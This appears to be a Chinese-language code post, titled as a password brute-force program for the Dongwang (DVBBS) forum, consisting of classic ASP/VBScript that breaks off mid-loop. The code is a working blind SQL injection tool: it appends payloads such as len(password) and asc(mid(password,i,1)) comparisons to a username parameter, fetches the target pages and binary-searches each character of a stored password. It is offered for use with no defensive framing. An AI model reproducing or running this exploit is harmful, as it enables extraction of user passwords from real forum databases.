動網論壇password暴力破解程式碼

標籤：style   http   color   os   io   for   art   cti   

<% 
response.buffer=false 
‘為防止程式陷入死迴圈，初始化一些最大重試值 
Dim MaxPassLen,MaxPassAsc 
MaxPassLen=20 ‘password最大長度 
MaxPassAsc=20

‘==== 字元轉換 
Function bytes2BSTR(vIn) 
strReturn = "" 
For j = 1 To LenB(vIn) 
ThisCharCode = AscB(MidB(vIn,j,1)) 
If ThisCharCode < &H80 Then 
strReturn = strReturn & Chr(ThisCharCode) 
Else 
NextCharCode = AscB(MidB(vIn,j+1,1)) 
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) 
j = j + 1 
End If 
Next 
bytes2BSTR = strReturn 
End Function 
‘ 以下是取網頁內容 ========== 
Function GetUrl(Url) 
set oSend=createobject("Microsoft.XMLHTTP") 
SourceCode = oSend.open ("GET",url,false) 
oSend.send() 
SourceCode = bytes2BSTR(oSend.responseBody) 
GetUrl = SourceCode 
End Function 
‘以下是推斷返回頁面效果 
Function ChkPage(SourceCode,SucKey,ErrKey) 
if Instr(SourceCode,SucKey) > 0 then 
ChkPage=true ‘頁面返回成功 
exit function 
end if 
if Instr(SourceCode,ErrKey) > 0 then 
ChkPage=false ‘頁面出錯 
exit function 
end if 
ChkPage=false ‘keyword資訊不正確或者是頁面未串連 
response.write("keyword資訊不正確或者是頁面未串連") 
response.end 
End Function

‘開始破解 
‘Dim url,username,password,SucKey,

Dim PassLenUrl 
Dim PassLen 
Dim ChkPassLen

If request("begin")<>"" then 
response.cookies("PassLen")=0 
url=request("url") 
username=request("username") 
password=request("password") 
SucKey=request("SucKey") 
ErrKey=request("ErrKey") 
response.write("第一步，破解password長度<BR>")

PassLen = 1 
ChkPassLen = false 
Do while not ChkPassLen 
PassLenUrl = Url & username & "‘%20and%20len(" & password & ")=" & PassLen & "%20and%20‘1‘=‘1" 
response.write("當前測試password位元為“" & PassLen & "”，請稍等......<BR>") 
ChkPassLen = ChkPage(GetUrl(PassLenUrl),SucKey,ErrKey) 
If ChkPassLen Then 
response.write("成功！！！password位元已經測試出來了，開始測試詳細位元<BR>") 
exit do 
Else 
response.write("不行，繼續下一位測試！<BR>") 
End If 
If PassLen > MaxPassLen then 
response.write( "password位元未能測試出，請確認是否有此使用者或又一次調整password長度範圍") 
response.end 
exit do 
End If 
PassLen = PassLen + 1 
Loop 
response.write ("<FONT COLOR=red>已經測試出password長度為" & PassLen & "，開始測試詳細password值</FONT><BR><BR>") 
‘迴圈每一位 
Dim Asc1,Asc2,Asc10,Asc20,Ascstr 
‘Dim AscArr(PassLen) 
Dim ChkPass,Asctemp1,Asctemp,count 
Ascstr = ""

For i=1 to PassLen 
ChkPass = false 
Asc1 = 33 
Asc2 = 126 
response.write "開始破解第" & i & "位password<BR>" 
‘用二分法取asc碼範圍 
count=1 
suc=false 
Do while not suc 
Asctemp1=Asctemp 
if (Asc2-Asc1) mod 2 = 1 then 
Asctemp=(Asc2-Asc1-1)/2 
else 
Asctemp=(Asc2-Asc1)/2 
end if

response.write "劃定password範圍為：" & chr(Asc1) & " -- " & chr(Asc2) & PassLenUrl & "<BR>" 
PassLenUrl = Url & username & "‘%20and%20asc(mid(password,"&i&",1))>=" & int(Asc1) & "%20and%20asc(mid(password,"&i&",1))<=" & int(Asc2) & "%20and%20‘1‘=‘1" 
response.write "劃定password範圍為：" & chr(Asc1) & " -- " & chr(Asc2) & PassLenUrl & "<BR>" 
ChkPass = ChkPage(GetUrl(PassLenUrl),SucKey,ErrKey) 
if Asc1 = 33 and Asc2 = 126 and not ChkPass then 
response.write "password不在所設定ASC碼範圍內" 
%>